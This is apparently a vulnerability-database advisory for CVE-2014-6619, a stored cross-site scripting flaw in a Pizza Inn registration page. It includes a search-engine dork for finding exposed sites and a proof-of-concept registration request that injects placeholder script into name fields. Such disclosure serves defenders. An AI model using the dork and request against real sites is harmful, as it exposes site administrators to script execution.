Pizza Inn Registration Stored XSS

2014.09.23

Credit: Kenneth F. Belva

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2014-6619

CWE: N/A

Dork: inurl:register-exec.php

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Title: Pizza Inn Registration Stored XSS
Severity: High
CVE-ID: CVE-2014-6619
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
http://xssWarrior.com
http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/restaurantmis/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com
Description:
============
On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
Proof of Concept :
==================
http://[domain]/PizzaInn/register-exec.php
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Pizza Inn Registration Stored XSS

Dork: inurl:register-exec.php

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.